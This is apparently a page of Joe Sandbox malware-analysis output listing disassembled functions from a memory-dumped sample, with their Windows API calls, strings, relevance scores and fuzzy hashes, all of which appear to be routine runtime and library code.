Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction ID: 5618e543839d9be2d8943b19bddba6d1b0604f396e76d7c6f20bed9d4bff581d
Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction Fuzzy Hash: 7E51E332B15A5185F710DB29E8403AEBB70FB557A8F848136CE4E57A98DF38D059D720

Function 00007FF716141E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF716124DF4), ref: 00007FF716141E87
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF716124DF4), ref: 00007FF716141F09
SysAllocString.OLEAUT32 ref: 00007FF716141F16

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
Instruction ID: 1f9a804eb36abde1d69e0884e38a81cbbb5099ff033e26bbe90c847363d3f276
Opcode Fuzzy Hash: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
Instruction Fuzzy Hash: 1441F731B09E4585F754AF36AC5127AA290EF04BB5F844634EA2D47BD5EF3CD04A9320

Function 00007FF71614F414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF71614F536

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
Instruction ID: f7820b3016d5ff166bb0560ddcda2443f21309a731890a3b5ef38fa51d42c8a6
Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
Instruction Fuzzy Hash: 0D41B371B09E4285FA15AB1ABD08576A295BB84BF0F898535DD1D4B788EF3CE448E320

Function 00007FF7161556D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7161556FF
_set_statfp.LIBCMT ref: 00007FF71615571A
_set_statfp.LIBCMT ref: 00007FF716155736
_set_statfp.LIBCMT ref: 00007FF716155772

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction ID: 3d643498e1001f5d6b4b3f1054363e002d3aa4ad7aa26e2642d3fb2282ee81e4
Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction Fuzzy Hash: 65116036E18E0781F654312DFD4137BD561AF573B0EC88234EA7D865DE9E2CA4486125

Function 00007FF71613FE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF71613FE41
GetMessageW.USER32 ref: 00007FF71613FE58
TranslateMessage.USER32 ref: 00007FF71613FE63
DispatchMessageW.USER32 ref: 00007FF71613FE6E
WaitForSingleObject.KERNEL32 ref: 00007FF71613FE7C

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Message$DispatchObjectPeekSingleTranslateWait
String ID:
API String ID: 3621893840-0
Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction ID: 3b9776867922abf17fff9ee7f49d3d6557a497d6a1b754c211ab23a401d8609c
Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction Fuzzy Hash: 0EF04F22B2894682F750A725FC95A37A261FFA4B25FC41030E94F468949E2CD54DE720

Function 00007FF71614625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF716146286
abort.LIBCMT ref: 00007FF7161464EA

Strings

csm, xrefs: 00007FF7161462AB
csm, xrefs: 00007FF71614641A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: __except_validate_context_recordabort
String ID: csm$csm
API String ID: 746414643-3733052814
Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
Instruction ID: 878fac4435d841b32e51af2390ba4416490d894c194a7d924919e4ac1157e193
Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
Instruction Fuzzy Hash: E471E872608AA1C6EB609F21E85077EFBA0EB00BE8F448535DE4C07689DF3CD499D790

Function 00007FF7161480F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF71614811B
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7161482ED

Strings

, xrefs: 00007FF716148276
*, xrefs: 00007FF716148221

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
Instruction ID: 29dd61ea3cd62dfc9dc488dc3f0e4f6d019fb2388ab0bc5fddf8782b0bd3bba8
Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
Instruction Fuzzy Hash: 1151AB7290CE428AF7E4AE38A84477EB7A0FB05B28F951135CE4943199EF38D449E625

Function 00007FF716151758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7161517CB
MultiByteToWideChar.KERNEL32 ref: 00007FF716151894
GetStringTypeW.KERNEL32 ref: 00007FF7161518AE

Strings

$%s, xrefs: 00007FF71615175A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ByteCharMultiWide$StringType
String ID: $%s
API String ID: 3586891840-3791308623
Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
Instruction ID: ead5a4595c148a2a23216ff15a3e94ff297596613b77917b26db7160dba866a5
Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
Instruction Fuzzy Hash: 59419532B14F8149FB619F29EC012AAA2A1FB55BB9F884635DE1D477C8DF3CE4499310

Function 00007FF7161466A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF716145210: abort.LIBCMT ref: 00007FF716145223

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF71614674A
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF716146776

Strings

csm, xrefs: 00007FF716146876

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_recordabort
String ID: csm
API String ID: 2466640111-1018135373
Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction ID: 5fe4de63569317d22e500c0765999f87678b97edaedc876d020aec09b3f4e813
Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction Fuzzy Hash: DC519F36619B52C7E620AB25F84026FB7A4FB89BA0F800535DB8C07B55EF38E054DB50

Function 00007FF716154360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF716154446
WriteFile.KERNEL32 ref: 00007FF716154479
GetLastError.KERNEL32 ref: 00007FF71615449B

Strings

U, xrefs: 00007FF716154424

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
Instruction ID: 5904a38fff702a26e39c9c8efc61b8a75b0140bf5144debdaeaadb73b6f1c423
Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
Instruction Fuzzy Hash: EC41C222719A8182E750DF29F8043BAE760FB897A4F854031EE4D87B58DF7CD449D710

Function 00007FF7161390B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7161390D9
GetObjectW.GDI32 ref: 00007FF716139107
ReleaseDC.USER32 ref: 00007FF7161391BB

Strings

, xrefs: 00007FF716139153

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ObjectRelease
String ID:
API String ID: 1429681911-3916222277
Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction ID: 7e3e7306fabc894495e90501dd47e56cbc03e29a0c2ceb923fa5dca3bb579f01
Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction Fuzzy Hash: 0A313C35708B4286EA04AF12BC1866BB7A1F789FE5F904435ED4A47B64CE3CD849DB10

Function 00007FF71612E870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,?,00007FF71613317F,?,?,00001000,00007FF71611E51D), ref: 00007FF71612E8BB
CreateSemaphoreW.KERNEL32(?,?,?,00007FF71613317F,?,?,00001000,00007FF71611E51D), ref: 00007FF71612E8CB
CreateEventW.KERNEL32(?,?,?,00007FF71613317F,?,?,00001000,00007FF71611E51D), ref: 00007FF71612E8E4

Strings

Thread pool initialization failed., xrefs: 00007FF71612E900

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction ID: 3e704ce3c42bf59e7401fffcadc82120fd26c3864fe34d36bcbeae118ace1607
Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction Fuzzy Hash: 1E212E72E15E4186F7409F24F8443AE72A2FB94B1CF548034CA0C4A284DF7E9859D7A0

Function 00007FF7161385E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7161385EC
GetDeviceCaps.GDI32 ref: 00007FF7161385FD
ReleaseDC.USER32 ref: 00007FF71613860A

Strings

, xrefs: 00007FF716138610

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-3916222277
Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction ID: 72ae2d255a31a5c0cedc34b18192978f7da5001d8836475ae241c94c88422ee6
Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction Fuzzy Hash: B5E0C220B08A4282FB0877B6B98903BA2A1EB4CBE0F558035DA1F87794CE3CC8C84310

Function 00007FF71611D1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNEL32 ref: 00007FF71611D46C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611D554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611D55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611D560

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileTime
String ID:
API String ID: 1137671866-0
Opcode ID: 88445e0129e065253ce0f33a9011623327727bb64f50aa72950859709c100b27
Instruction ID: 57e147054d93cb8edb0254c1bd1275c11221696abb14118e99724add20480f4d
Opcode Fuzzy Hash: 88445e0129e065253ce0f33a9011623327727bb64f50aa72950859709c100b27
Instruction Fuzzy Hash: 61A160A2A18E8281FA10FB65FC411AFA371FB857A4FD05131EA5D07A99DF3CE548D710

